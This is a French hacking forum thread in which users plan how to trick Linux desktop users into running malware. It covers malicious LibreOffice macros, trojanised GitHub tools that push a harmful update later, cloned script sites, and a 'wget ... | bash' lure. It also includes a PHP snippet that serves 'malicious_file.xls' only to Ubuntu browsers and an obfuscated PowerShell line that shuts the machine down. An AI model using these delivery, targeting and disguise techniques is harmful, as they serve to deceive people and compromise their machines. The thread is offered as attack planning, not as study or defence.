Annonce

Réduire
Aucune annonce.

Linux et Social Engineering

Réduire
X
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Linux et Social Engineering

    Bonjour,

    Si je devais faire le test en grandeur réel, ce serait du "grey hack" avec tous les risques qui vont avec (mais j'avoue que ça démange, rien de tel que les conditions réelles...) donc je ne le ferais pas. Mais voici où j'en suis :

    - J'ai un script me permettant de prendre le contrôle, avec une probabilité non négligeable, d'une machine de bureau Linux (Ubuntu, Mint et Debian, je ne me suis pas penché sur les autres). Pour pouvoir installer ce script, il faut une exécution d'une simple ligne de code en mode utilisateur et là, les choix sont moindres (le top ayant été d'exploiter une faille navigateur, mais là, on est dans une autre catégorie...). Les choix sont donc pas nombreux, faire exploiter une faille applicative avec un shellcode exécuté sous forme d'un cheval de troie (mais il faut la faille ET le shellcode)... ou beaucoup plus simple, faire exécuter une macro sous libre-office, par exemple.

    - Bon, la macro, je l'ai aussi et elle fonctionne. En cliquant sur le méchant bouton "Warning : autoriser les macros dans ce document", je m'infecte immédiatement.

    - Il reste à faire exécuter la macro du fichier sans se faire remarquer. Sur Libre-office, il y a un gros warning qui demande de faire très attention lorsque l'on active une macro (tu m'étonnes !). Je vois ici deux possibilités, soit la cible est précise, et il faudra récupérer sa signature de navigateur (URL d'image dans un email, social engineering, etc), soit il s'agit de ciblage de masse et dans ce cas, c'est "au petit bonheur la chance" (risque de détection, etc).

    Mon hypothèse est celle-ci : On fait tout un foin sur le fait que Linux est bien plus sécurisé que Windows, et qu'on n'y trouve quasiment pas de malwares car ceux-ci soit ciblent principalement Windows, soit ne s'exécutent pas sur Linux. Or, on n'est pas tous des "tech saavy"... Je pensais donc à ceci (mais encore une fois, l'hypothèse n'est pas vérifiable sans "grey hacking" donc je vous la soumet plutôt :

    - Proposer deux fois le même fichier libre-office (xls me parait bien), l'une contenant la macro malicieuse, l'autre une macro non malicieuse, peu importe ce qu'elles sont sensées exécuter pourvu que ce soit intéressant, et la rendre disponible par exemple via un lien depuis un forum d'informatique renvoyant vers un de vos sites "pirates" voire un site piraté. Ce site proposera au téléchargement les deux versions de ce fichier via un script en javascript en fonction de la signature du navigateur qui la télécharge (si c'est Windows, la pièce non malicieuse, et si c'est la signature de votre cible ou de vos cibles, la pièce malicieuse). Ca, je ne l'ai pas encore testé sur moi-même, je le ferais sans doute dans la semaine, le temps de bricoler le machin.

    Honnêtement, ne vous feriez-vous pas avoir ? (Personnellement, si le fichier m'intéresse, et dans un tel contexte, il y a de grandes chances pour que j'autorise les macros plutôt que d'ouvrir cette dernière pour voir ce qu'il y a dedans... car encore une fois, le lien est disponible sur un site d'informatique, donc lu et rerelu par plein de personnes, et moi, je suis sur Linux, Messieurs Dames... Linux, vous entendez ?! Et Linux, c'est super sécurisé !).

    Qu'en pensez-vous ?
    Dernière modification par acloseone, 20 août 2018, 12h06.

  • #2
    Je suis pas convaincu par la macro. Ca fait des années que tout le monde se dit que c'est dangereux, et au final ça fait du taff pour pas grand chose. Je pense que la probabilité d'execution de ton script depuis le doc avec macro est pas beaucoup plus haute que si tu balançais un bon vieux .sh en le faisant passer pour un outil, au hasard, "d’auto-diagnostique Linux" (Quitte à rajouter quelques bricoles dans ton script pour faire croire à l'utilisateur final que ça fait bien ce qu'il croit que ça fait, et obfusquer un peu plus les parties louches).

    Enfin pour le forum, pourquoi pas, mais : Si t'as 0 messages, ça fait louche. Si un mec découvre le but du script, il va le dire et personne d'autre ne le chopera // tu seras ban (et donc potentiellement retour à un compte qui fait louche avec 0 messages).

    Je crois qu'a ta place j’hébergerai ça sur github en le faisant passer pour un tool de crack de clef WPA (ou n'importe quoi qui puisse être un peu à la mode), et j'irais post le lien sur des forums de scripts kiddies (tu sais, ces mecs qui sont foutus d'exec un .sh en root sous kali sans rien capter à ce qu'ils font xD).
    Si tu veux le déployer plus massivement, tu peux même faire un vrai tool autour de ton script, dont l'objet officiel dépendra du public visé. (c'est d'ailleurs le principe des "10 Free Awesome Screensavers, Best add-on for IT admins, ...")
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Oui, effectivement. J'avais en effet penser à récupérer, par exemple, le script lazykali.sh (un ensemble de tools pour scripkiddies), et le balancer sur un site google refait à l'identique de celui de l'auteur original, puis récupérer sa vidéo youtube et la modifier pour changer les URL vers ma page google, et la balancer sur dailymotion (histoire que ce soit identique à l'oeil nu). Il n'y aura pas beaucoup de personnes qui auront gratter dans le script et ceux qui ont la flemme d'installer les outils un par un sont justement probablement ceux qui ne capteraient pas la supercherie, même en lisant le code. Après, il faudrait que je me penche sur un moyen d'obfuscation un peu complexe, histoire de planter même quelqu'un qui s'y connait un minimum, avec des variables prédéfinies qui se croisent, s'incrémentent et interagissent (voire qui ne se décode qu'en interaction avec la date, à la seconde prés, les autres possibilités donnant une simple erreur), afin de ne pas pouvoir être décodé à la lecture, sauf à sortir la calculatrice et le calepin, mais uniquement à l'exécution, genre avec un bash -x. Quitte à ajouter une petite erreur de concaténation pour faire passer la pilule. Peut-être, un jour, je jeterais un oeil...

      Pour la participation à un forum, il s'agirait de s'y inscrire pour développer un petit outil ou un petit fichier xls par exemple, genre un débutant qui demande des conseils, donc une dizaine ou une vingtaine de posts. Faire ça bien, ça demande toujours du temps (et juste pour tester une hypothèse, ça en demande trop !)... Le fichier étant ainsi lu par plusieurs membres plus expérimentés, ça donne un gage de confiance si l'on récupère le fichier en bout de topic...

      Mais effectivement, le top étant sans doute de développer un petit outil et le mettre sur un site... Le tout validé de la même manière : via un gros forum Linux par exemple, tout en conservant la sélection de la cible par javascript ou php pour proposer une version malicieuse uniquement à quelques cibles de choix. Le machin étant validé et revalidé par "des anciens", celui qui n'a pas les connaissances n'ouvrira jamais le script pour lire le code. On doit aussi pouvoir poster un lien du genre "wget -O - http://ubuntu-tool.com | bash" sur ce même genre de forum, la date du post ainsi que les réponses suivantes faisant foi... En gros, le script original reste valide et fonctionnel pour tout le monde, seule sa "version parrallèle" sera disponible uniquement pour quelques cibles sélectionnées.
      Dernière modification par acloseone, 20 août 2018, 16h16.

      Commentaire


      • #4
        Bonjour,

        Pour reprendre ton idée et celle de Krisscool tu peux toujours développer un tool utile que tu met sur un GitHub. Pas besoin de faire quelque chose de très complexe, tu peux très bien forker quelque chose d'existant. Tant que ça simplifie la vie aux scripts kiddie, c'est bon. Dans ton script totalement légitime et sans danger (pour le moment), tu intègre une vérification de ton Git à chaque utilisation de la commande/service et une MàJ automatique si il y a modification par exemple. A partir de là:

        - Tu poste ton tool pour qu'il soit utilisé
        - Tu attend un peu que les admins le valide et que ta/tes cibles l'utilisent
        - Après quelques temps, tu injecte ton .sh dans ton GitHub

        Ce qui passera aux yeux des utilisateurs comme une simple MàJ te permettra d’exécuter plus ou moins ce que tu veux. Certaines de tes cibles pourraient même se dire "Une MàJ?! C'est quelqu'un de sérieux!". En règle général on se méfie peu des MàJ des programmes que l'on sait (pense) sains

        Pour ajouter un peu de poids à ton poste, tu peu essayer de faire ami-ami avec quelqu'un de reconnu. Puis, un jour, prétextant un problème avec ton navigateur, lui demandé de poster ton tool à ta place. Dis comme ça sa parait un peu vraiment gros mais sait on jamais
        Dernière modification par bambish, 20 août 2018, 19h16.

        Commentaire


        • #5
          Merci pour vos commentaires. Ca commence à faire un paquet d'idées intéressantes !

          C'est vrai qu'un fork pourrait aussi le faire. Avec une mise à jour, ça permettrait aussi de cibler en fonction de certains critères (distribution, modifs, applications installées) et ainsi de réduire la détection. C'est dur de ne pas se laisser tenter...

          Pour le php, ça ne mange pas de pain, voici quelques lignes qui sélectionnent le fichier à faire télécharger en fonction du useragent (Ubuntu / non Ubuntu). On doit pouvoir faire plus précis, mais c'était pour le test :

          Code:
          <?php
          $file1 = 'file.xls';
          $file2 = 'malicious_file.xls';
          $agent = $_SERVER['HTTP_USER_AGENT'];
          if (strlen(strstr($agent, 'Ubuntu')) > 0) {
          readfile($file2);
          } else {
          readfile($file1);
          }
          ?>
          Je vais juste essayer de faire quelques tests supplémentaires avec le BuildID et avec la signature des fonts (faut que je trouve comment ça marche !) car cette dernière est très précise tout en étant stable, si on la couple avec le BuildID et l'useragent.

          Commentaire


          • #6
            J’adore les hackers mais malheureusement je n’en suis pas un mais je veux apprendre et travailler en toute confiance avec un hacker je suis un broubrou donc j’attends vos propositions pour que j’en suis puisse vous aider et vous mettre à l’epreuve Je veux un hacker cool

            Commentaire


            • #7
              Ah. Moi, comme indiqué dans ma présentation, je ne suis pas un hacker, mais quelqu'un qui s'intéresse à pas mal de choses. Trop de travail à faire sur sa propre image lorsque l'on en est un, et je porte très mal les sweats à capuche. En revanche, je suis plutôt cuir, lanières, martinet, et bouboule dans la boubouche, tout ça entre amis consentants, évidemment. Et c'est le seul point commun que j'ai avec un hacker : les nuits blanches à m'adonner à ma troisième passion, la seconde étant de fesser les chats.

              Dernière modification par acloseone, 21 août 2018, 12h36.

              Commentaire

              Chargement...
              X